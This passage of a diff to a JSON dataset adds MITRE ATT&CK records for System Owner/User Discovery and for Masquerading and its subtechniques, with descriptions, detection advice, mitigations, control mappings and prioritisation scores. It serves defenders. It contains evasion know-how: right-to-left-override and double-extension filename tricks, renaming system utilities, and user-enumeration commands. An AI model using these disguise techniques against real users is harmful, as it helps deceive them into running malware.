+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.09523809523809523,
+            "mitigation_score": 0.16363636363636364,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1033",
+        "name": "System Owner/User Discovery",
+        "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.",
+        "url": "https://attack.mitre.org/techniques/T1033",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.2957034652380952,
+        "adjusted_score": 0.2957034652380952,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1952380952380952,
+            "detection_score": 0.41
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00046537
+    },
+    {
+        "tid": "T1036",
+        "name": "Masquerading",
+        "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
+        "url": "https://attack.mitre.org/techniques/T1036",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE”.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "File: File Modification",
+            "Image: Image Metadata",
+            "Process: Process Metadata",
+            "Scheduled Job: Scheduled Job Metadata",
+            "Scheduled Job: Scheduled Job Modification",
+            "Service: Service Creation",
+            "Service: Service Metadata"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1036.001",
+                "name": "Masquerading: Invalid Code Signature",
+                "url": "https://attack.mitre.org/techniques/T1036/001",
+                "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.",
+                "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
+                "mitigations": [
                     {
                         "mid": "M1045",
                         "name": "Code Signing",
                         "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
                         "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                    }
+                ]
+            },
+            {
+                "tid": "T1036.002",
+                "name": "Masquerading: Right-to-Left Override",
+                "url": "https://attack.mitre.org/techniques/T1036/002",
+                "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
+                "detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1036.003",
+                "name": "Masquerading: Rename System Utilities",
+                "url": "https://attack.mitre.org/techniques/T1036/003",
+                "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)",
+                "detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1036.004",
+                "name": "Masquerading: Masquerade Task or Service",
+                "url": "https://attack.mitre.org/techniques/T1036/004",
+                "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",
+                "detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1036.005",
+                "name": "Masquerading: Match Legitimate Name or Location",
+                "url": "https://attack.mitre.org/techniques/T1036/005",
+                "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.",
+                "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.",
+                "mitigations": [
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
                         "url": "https://attack.mitre.org/mitigations/M1038"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1036.006",
+                "name": "Masquerading: Space after Filename",
+                "url": "https://attack.mitre.org/techniques/T1036/006",
+                "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt  (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
+                "detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1036.007",
+                "name": "Masquerading: Double File Extension",
+                "url": "https://attack.mitre.org/techniques/T1036/007",
+                "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
+                "detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 1.619047619047619,
+        "adjusted_score": 1.619047619047619,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7",
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "IA-9",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.519047619047619,
+            "mitigation_score": 0.34545454545454546,
+            "detection_score": 0.71
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1036.001",
+        "name": "Masquerading: Invalid Code Signature",
+        "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.",
+        "url": "https://attack.mitre.org/techniques/T1036/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            }
+        ],
+        "cumulative_score": 0.16666666666666669,
+        "adjusted_score": 0.16666666666666669,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "4.1"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.002",
+        "name": "Masquerading: Right-to-Left Override",
+        "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
+        "url": "https://attack.mitre.org/techniques/T1036/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.003",
+        "name": "Masquerading: Rename System Utilities",
+        "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)",
+        "url": "https://attack.mitre.org/techniques/T1036/003",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "File: File Modification",
+            "Process: Process Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.44285714285714284,
+        "adjusted_score": 0.44285714285714284,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.004",
+        "name": "Masquerading: Masquerade Task or Service",
+        "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",
+        "url": "https://attack.mitre.org/techniques/T1036/004",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Scheduled Job: Scheduled Job Metadata",
+            "Scheduled Job: Scheduled Job Modification",
+            "Service: Service Creation",
+            "Service: Service Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1142857142857143,
+        "adjusted_score": 0.1142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.005",
+        "name": "Masquerading: Match Legitimate Name or Location",
+        "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.",
+        "url": "https://attack.mitre.org/techniques/T1036/005",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata",
+            "Image: Image Metadata",
+            "Process: Process Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7",
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "IA-9",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.006",
+        "name": "Masquerading: Space after Filename",
+        "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt  (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
+        "url": "https://attack.mitre.org/techniques/T1036/006",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1036.007",
+        "name": "Masquerading: Double File Extension",
+        "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
+        "url": "https://attack.mitre.org/techniques/T1036/007",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1036",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
